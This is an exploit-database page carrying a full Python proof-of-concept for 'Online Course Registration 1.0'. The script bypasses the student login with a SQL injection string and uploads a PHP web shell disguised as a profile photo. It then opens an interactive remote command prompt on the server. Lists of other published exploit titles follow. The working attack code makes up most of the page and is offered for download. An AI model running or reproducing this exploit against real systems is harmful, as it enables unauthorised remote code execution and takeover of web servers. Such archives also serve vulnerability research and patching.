Menu

Search for hundreds of thousands of exploits

"Online Course Registration 1.0 - Unauthenticated Remote Code Execution"

Author

Exploit author

boku

Platform

Exploit platform

php

Release date

Exploit published date

2020-07-26

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
# Exploit Title: Online Course Registration 1.0 - Unauthenticated Remote Code Execution
# Exploit Author: Bobby Cooke
# Credit to BKpatron for similar Auth Bypass on admin page - exploit-db.com/exploits/48559
# Date: 2020-07-15
# Vendor Homepage: Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 | Python 2.7.18

import requests, sys, urllib, re
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
ok = Fore.GREEN+'['+Fore.RESET+'+'+Fore.GREEN+']'+Fore.RESET+' '
err = Fore.RED+'['+Fore.RESET+'!'+Fore.RED+']'+Fore.RESET+' '
info = Fore.BLUE+'['+Fore.RESET+'-'+Fore.BLUE+']'+Fore.RESET+' '
RS   = Style.RESET_ALL
FR   = Fore.RESET
YL   = Fore.YELLOW
RD   = Fore.RED

def webshell(SERVER_URL, session):
    try:
        WEB_SHELL = SERVER_URL+'studentphoto/kaio-ken.php'
        getdir  = {'telepathy': 'echo %CD%'}
        r2 = session.post(url=WEB_SHELL, data=getdir, verify=False)
        status = r2.status_code
        if status != 200:
            print(err+"Could not connect to the webshell.")
            r2.raise_for_status()
        print(ok+'Successfully connected to webshell.')
        cwd = re.findall('[CDEF].*', r2.text)
        cwd = cwd[0]+"> "
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        print(RD+')'+YL+'+++++'+RD+'['+FR+'=========>'+'     WELCOME BOKU     '+'<========'+RD+']'+YL+'+++++'+RD+'('+FR)
        while True:
            thought = raw_input(term)
            command = {'telepathy': thought}
            r2 = requests.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except:
        print('\r\n'+err+'Webshell session failed. Quitting.')
        quit()

def formatHelp(STRING):
    return Style.BRIGHT+Fore.RED+STRING+Fore.RESET

def header():
    SIG  = RD+'            /\\\n'+RS
    SIG += YL+'/vvvvvvvvvvvv '+RD+'\\'+FR+'--------------------------------------,\n'
    SIG += YL+'`^^^^^^^^^^^^'+RD+' /'+FR+'============'+RD+'BOKU'+FR+'====================="\n'
    SIG += RD+'            \/'+RS+'\n'
    return SIG

if __name__ == "__main__":
    print(header())
    if len(sys.argv) != 2:
        print(formatHelp("(+) Usage:\t python %s <WEBAPP_URL>" % sys.argv[0]))
        print(formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/Online Course Registration/'" % sys.argv[0]))
        quit()
    SERVER_URL = sys.argv[1]
    if not re.match(r".*/$", SERVER_URL):
        SERVER_URL = SERVER_URL+'/'
    LOGIN_URL  = SERVER_URL+'index.php'
    PROFILE_URL = SERVER_URL+'my-profile.php'
    print(info+'Creating session and saving PHPSESSID')
    s = requests.Session()
    get_session = s.get(SERVER_URL, verify=False)
    if get_session.status_code == 200:
        print(ok+'Successfully connected to server and created session.')
        print(info+get_session.headers['Set-Cookie'])
    else:
        print(err+'Cannot connect to the server and create a web session.')
    bypass_data = {'regno' : '\' or 1=1; -- boku', 'password' : '\' or 1=1; -- boku', 'submit' : ''}
    print(info+'Bypassing authentication of student login portal.')
    auth_bypass = s.post(url=LOGIN_URL, data=bypass_data, verify=False)
    if auth_bypass.history:
        for resp in auth_bypass.history:
            print(info+'Response Status-Code: ' + str(resp.status_code))
            print(info+'Location: ' + str(resp.headers['location']))
            redirectURL = resp.headers['location']
            if re.match(r".*change-password.php", redirectURL):
                print(ok+'Successfully bypassed user portal authentication.')
            else:
                print(err+'Failed to bypass user portal authentication. Quitting.')
                quit()
    get_profile = s.get(url=PROFILE_URL, verify=False)
    Name = str(re.findall(r'name="studentname" value=".*"', get_profile.text))
    Name = re.sub('^.*name="studentname" value="', '', Name)
    Name = re.sub('".*$', '', Name)
    PinCode = str(re.findall(r'name="Pincode" readonly value=".*"', get_profile.text))
    PinCode = re.sub('^.*name="Pincode" readonly value="', '', PinCode)
    PinCode = re.sub('".*$', '', PinCode)
    RegNo = str(re.findall(r'name="studentregno" value=".*"', get_profile.text))
    RegNo = re.sub('^.*name="studentregno" value="', '', RegNo)
    RegNo = re.sub('".*$', '', RegNo)
    print(ok+'{studentname:'+Name+', Pincode:'+PinCode+', studentregno:'+RegNo+'}')
    avatar_img  = {
                'photo': 
                  (
                    'kaio-ken.php', 
                    '<?php echo shell_exec($_REQUEST["telepathy"]); ?>', 
                    'image/png', 
                    {'Content-Disposition': 'form-data'}
                  ) 
              }
    upld_data = {'studentname':Name, 'studentregno':RegNo,'Pincode':PinCode,'cgpa':'0.00','submit':''}
    webshell_upload = s.post(url=PROFILE_URL, files=avatar_img, data=upld_data, verify=False)
    print(ok+'Uploaded webshell. Now connecting via POST requests using telepathy.')
    webshell(SERVER_URL, s)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2020-11-27 "House Rental 1.0 - 'keywords' SQL Injection" webapps php boku
2020-09-29 "CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)" local windows boku
2020-09-15 "Tailor MS 1.0 - Reflected Cross-Site Scripting" webapps php boku
2020-09-03 "BarracudaDrive v6.5 - Insecure Folder Permissions" local windows boku
2020-09-02 "Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)" webapps php boku
2020-08-13 "GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)" webapps php boku
2020-08-10 "Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)" webapps php boku
2020-07-26 "LibreHealth 2.0.0 - Authenticated Remote Code Execution" webapps php boku
2020-07-26 "Online Course Registration 1.0 - Unauthenticated Remote Code Execution" webapps php boku
2020-06-16 "Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path" local windows boku
2020-06-10 "10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)" local windows boku
2020-05-22 "Gym Management System 1.0 - Unauthenticated Remote Code Execution" webapps php boku
2020-05-07 "Pisay Online E-Learning System 1.0 - Remote Code Execution" webapps php boku
2020-05-01 "Online Scheduling System 1.0 - Authentication Bypass" webapps php boku
2020-05-01 "ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting" webapps php boku
2020-05-01 "Online Scheduling System 1.0 - Persistent Cross-Site Scripting" webapps php boku
2020-04-20 "Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path" local windows boku
2020-04-20 "Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)" local windows boku
2020-04-13 "Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)" local windows boku
2020-02-17 "DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path" local windows boku
2020-02-17 "TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path" local windows boku
2020-02-17 "Cuckoo Clock v5.0 - Buffer Overflow" local windows boku
2020-02-17 "BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path" local windows boku
2020-02-14 "SprintWork 2.3.1 - Local Privilege Escalation" local windows boku
2020-02-14 "HomeGuard Pro 9.3.1 - Insecure Folder Permissions" local windows boku
2020-02-13 "OpenTFTP 1.66 - Local Privilege Escalation" local windows boku
2020-02-11 "FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path" local windows boku
2020-02-11 "Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path" local windows boku
2020-02-11 "freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path" local windows boku
2020-02-11 "Torrent iPod Video Converter 1.51 - Stack Overflow" local windows boku 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected